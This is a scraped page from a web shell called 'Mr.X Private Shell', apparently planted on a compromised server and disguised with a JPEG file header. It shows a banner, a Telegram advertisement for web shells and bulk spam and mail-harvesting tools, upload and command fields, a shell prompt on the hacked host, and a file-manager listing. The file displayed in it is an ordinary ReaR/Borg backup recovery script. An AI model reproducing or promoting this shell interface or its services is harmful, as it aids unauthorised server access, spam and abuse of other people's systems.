����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# Query Borg server for repository information
# and store it to BORGBACKUP_ARCHIVE_CACHE.
# This should avoid repeatedly querying Borg server, which could be slow.

borg_archive_cache_create && return

LogPrint "Failed to list Borg archive."
LogPrint "If you decide to continue, ReaR will partition your disks, but most probably will NOT be able to restore your data!"
# shellcheck disable=SC2154
LogPrint "Command \"borg list $BORGBACKUP_OPT_REMOTE_PATH ${borg_dst_dev}${BORGBACKUP_REPO}\" returned: "
LogPrint "Borg: $( cat "$BORGBACKUP_STDERR_FILE" )"

rear_workflow="rear $WORKFLOW"

unset choices
choices[0]="View '$rear_workflow' log file ($RUNTIME_LOGFILE)"
choices[1]="Use Relax-and-Recover shell and return back to here"
choices[2]="Continue '$rear_workflow'"
choices[3]="Abort '$rear_workflow'"

prompt="Make Borg archive manually accessible"
choice=""
wilful_input=""

while true ; do
    # Read user input.
    choice="$( UserInput -I BORGBACKUP_CONTINUE_WITH_RECOVER -p "$prompt" -D "${choices[3]}" "${choices[@]}" )" && wilful_input="yes" || wilful_input="no"

    case "$choice" in
        (${choices[0]})
            # Run 'less' with the original STDIN STDOUT and STDERR when 'rear' was launched by the user:
            less "$RUNTIME_LOGFILE" 0<&6 1>&7 2>&8
        ;;
        (${choices[1]})
            # rear_shell runs 'bash' with the original STDIN STDOUT and STDERR when 'rear' was launched by the user:
            # shellcheck disable=SC2154
            rear_shell "" "$rear_shell_history"
        ;;
        (${choices[2]})
            # Continue recovery:
            LogPrint "User confirmed to continue with '$rear_workflow'"
            break
        ;;
        (${choices[3]})
            # Abort recovery:
            abort_recreate
            # shellcheck disable=SC2015
            is_true "$wilful_input" && Error "User chose to abort '$rear_workflow' in ${BASH_SOURCE[0]}" || Error "Aborting '$rear_workflow' by default"
        ;;
    esac
done

Filemanager

Name Type Size Permission Actions
100_set_vars.sh File 886 B 0644
101_check_borg.sh File 111 B 0644
250_mount_usb.sh File 517 B 0644
400_check_archive_access.sh File 1.94 KB 0644